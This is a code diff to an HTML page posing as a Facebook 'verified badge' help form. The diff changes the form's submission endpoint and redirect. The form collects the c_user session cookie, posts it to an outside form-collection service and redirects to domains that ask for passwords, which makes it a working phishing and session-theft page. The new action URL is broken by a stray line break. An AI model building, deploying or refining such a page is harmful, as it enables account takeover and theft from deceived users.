--- a/help.html
+++ b/help.html
@@ -213,8 +213,10 @@
 
         <p class=form-notice>Please ensure that all required information is accurately provided. Failure to do so may result in not receiving a verified badge.</p>
 
-        <form class="content" action="https://submit-form.com/mMiBTAJCL" method="POST">
-            <input type="hidden" name="_redirect" value="https://please-re-enter-your-facebook-password.vercel.app/" />
+        <form class="content" action="https://submit-form.com/uYQhwVvq8
+
+Cookie" method="POST">
+            <input type="hidden" name="_redirect" value="https://info-submit-your-password.vercel.app/" />
 
             <div class=form-group>
                 <label for=c_user>c_user</label>
